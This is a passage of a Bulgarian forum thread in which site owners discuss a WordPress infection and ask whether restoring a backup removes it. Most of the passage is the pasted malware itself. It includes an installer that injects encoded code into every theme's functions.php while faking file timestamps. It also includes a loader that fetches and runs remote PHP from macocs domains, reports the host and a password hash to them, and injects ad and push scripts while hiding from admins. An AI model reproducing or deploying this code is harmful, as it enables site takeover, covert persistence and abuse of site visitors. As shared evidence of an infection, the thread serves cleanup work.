NcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgew0KDQoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoJCQkJDQoJCQkJZGVmYXVsdDogcHJpbnQgIkVSUk9SX1dQX0FDVElPTiBXUF9WX0NEIFdQX0NEIjsNCgkJCX0NCgkJCQ0KCQlkaWUoIiIpOw0KCX0NCg0KDQoNCg0KDQoNCg0KDQokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOw0KJGZ1bmNmaWxlICAgICAgPSBfX0ZJTEVfXzsNCmlmKCFmdW5jdGlvbl9leGlzdHMoJ3RoZW1lX3RlbXBfc2V0dXAnKSkgew0KICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOw0KICAgIGlmIChzdHJpcG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAnd3AtY3Jvbi5waHAnKSA9PSBmYWxzZSAmJiBzdHJpcG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAneG1scnBjLnBocCcpID09IGZhbHNlKSB7DQogICAgICAgIA0KICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQ0KICAgICAgICB7DQogICAgICAgICAgICAkY2ggPSBjdXJsX2luaXQoKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7DQogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCAwKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgVFJVRSk7DQogICAgICAgICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOw0KICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOw0KICAgICAgICAgICAgcmV0dXJuICRkYXRhOw0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICBmdW5jdGlvbiB0aGVtZV90ZW1wX3NldHVwKCRwaHBDb2RlKQ0KICAgICAgICB7DQogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsNCiAgICAgICAgICAgICRoYW5kbGUgICA9IGZvcGVuKCR0bXBmbmFtZSwgIncrIik7DQogICAgICAgICAgIGlmKCBmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpKQ0KCQkgICB7DQoJCSAgIH0NCgkJCWVsc2UNCgkJCXsNCgkJCSR0bXBmbmFtZSA9IHRlbXBuYW0oJy4vJywgInRoZW1lX3RlbXBfc2V0dXAiKTsNCiAgICAgICAgICAgICRoYW5kbGUgICA9IGZvcGVuKCR0bXBmbmFtZSwgIncrIik7DQoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOw0KCQkJfQ0KCQkJZmNsb3NlKCRoYW5kbGUpOw0KICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7DQogICAgICAgICAgICB1bmxpbmsoJHRtcGZuYW1lKTsNCiAgICAgICAgICAgIHJldHVybiBnZXRfZGVmaW5lZF92YXJzKCk7DQogICAgICAgIH0NCiAgICAgICAgDQoNCiR3cF9hdXRoX2tleT0nYmI5YWVkNjk2YjA4MGQ2ZDMyN2Q5MjdmYzBiNzMzZDgnOw0KICAgICAgICBpZiAoKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3Lm1hY29jcy5jb20vY29kZS5waHAiKSBPUiAkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50c190Y3VybCgiaHR0cDovL3d3dy5tYWNvY3MuY29tL2NvZGUucGhwIikpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgew0KDQogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsNCiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsNCiAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsNCiAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsNCiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgew0KICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICANCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy5tYWNvY3MucHcvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgew0KDQppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsNCiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsNCiAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsNCiAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsNCiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgew0KICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICB9IA0KCQkNCgkJICAgICAgICBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3Lm1hY29jcy50b3AvY29kZS5waHAiKSAgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlICkgew0KDQppZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsNCiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsNCiAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsNCiAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsNCiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgew0KICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQoJCWVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7DQogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsNCiAgICAgICAgICAgDQogICAgICAgIH0gZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsNCiAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOyANCg0KICAgICAgICB9IGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoJ3dwLXRtcC5waHAnKSBBTkQgc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsNCiAgICAgICAgICAgIGV4dHJhY3QodGhlbWVfdGVtcF9zZXR1cCgkdG1wY29udGVudCkpOyANCg0KICAgICAgICB9IA0KICAgICAgICANCiAgICAgICAgDQogICAgICAgIA0KICAgICAgICANCiAgICAgICAgDQogICAgfQ0KfQ0KDQovLyRzdGFydF93cF90aGVtZV90bXANCg0KDQoNCi8vd3BfdG1wDQoNCg0KLy8kZW5kX3dwX3RoZW1lX3RtcA0KPz4=';
 
    $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
    $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
 

            $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
             
            $ping = true;
                $ping2 = false;
            if ($list = scandir( $themes ))
                {
                    foreach ($list as $_)
                        {
                     
                            if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
                                {
                                    $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
                                     
                                    if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
                                        {
                                            if (strpos($content, 'WP_V_CD') === false)
                                                {
                                                    $content = $install_code . $content ;
                                                    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
                                                    touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                                                }
                                            else
                                                {
                                                    $ping = false;
                                                }
                                        }
                                     
                                }
                             
                             
                                                              else
                                                            {
                                                            $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
                                                     foreach ($list2 as $_2)
                                                              {
                                                         

                                                                                    if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
                                                      {
                                    $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
                                     
                                    if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
                                        {
                                            if (strpos($content, 'WP_V_CD') === false)
                                                {
                                                    $content = $install_code . $content ;
                                                    @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
                                                    touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
                                                    $ping2 = true;
                                                }

                                            else
                                                {
                                                    //$ping = false;
                                                }
                                        }
                                     
                                }



                                                                                  }

                                                            }
                             
                             
                             
                             
                             
                             
                        }
                     
                    if ($ping) {
                        $content = @file_get_contents('http://www.macocs.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
                        //@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.macocs.com/admin.txt'));
                    }
                 
                                                            if ($ping2) {
                        $content = @file_get_contents('http://www.macocs.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
                        //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.macocs.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
                    }
                 
                 
                 
                }
     




?><?php error_reporting(0);?>

Код: 
/wp-includes/wp-tmp.php
File Size:    2,884 bytes
File last modified:    Sunday 29th of April 2018 05:57:19 PM
ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key='bb9aed696b080d6d327d927fc0b733d8';





$file=file_get_contents(get_template_directory().'/functions.php');
$filec=file_get_contents(get_stylesheet_directory().'/functions.php');
$rep="macocs.top";
$repw="macocs.xyz";
if (stripos($file,$rep) !== false)
{
$new_file=str_replace($rep,$repw,$file);
@file_put_contents(get_template_directory().'/functions.php',$new_file);
}

if (stripos($filec,$rep) !== false)
{
$new_filec=str_replace($rep,$repw,$filec);
@file_put_contents(get_stylesheet_directory().'/functions.php',$new_filec);
}


if ( ! function_exists( 'slider_option' ) ) {

function slider_option($content){
if(is_single())
{




$con = '
';

$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1594340"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1594343&interactive=1&pushup=1"></script>
<script src="//pushnest.com/ntfc.php?p=1594344" data-cfasync="false" async></script>
<script src="//go.mobtrks.com/notice.php?p=1594346&interstitial=1"></script>
';

$content=$content.$con2;
}
return $content;
}

function slider_option_footer(){
if(!is_single())
{




$con2 = '

<script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1594340"></script>
<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1594343&interactive=1&pushup=1"></script>
<script src="//pushnest.com/ntfc.php?p=1594344" data-cfasync="false" async></script>
<script src="//go.mobtrks.com/notice.php?p=1594346&interstitial=1"></script>

';

echo $con2;
}
}








function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }


if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}







if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);


}



}






$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
    $sevisitor=true;
  }
}






if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in())
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}

}





}

Ето май какво се вмъкват
Увеличете...
Не го трий бе, луд ли си?
Това си е файл на wp-то.
 
devilx каза:
Като гледам тези файлове се появяват на 8 март..

Имам архив на 5 март и след Restore възможно ли е тези файлове да си седят?
Увеличете...

Зависи какъв е рестора. Най-вероятно ресторва само файловете които са присъствали когато бекъпа е правен. Може да изтриеш сайта(или да преместиш файловете в друга папка) и после да го ресторнеш. По този начин ще бъде точно както е било на 5-ти.
 
Трябва да си влезнал или регистриран, за да отговориш тук.

Горе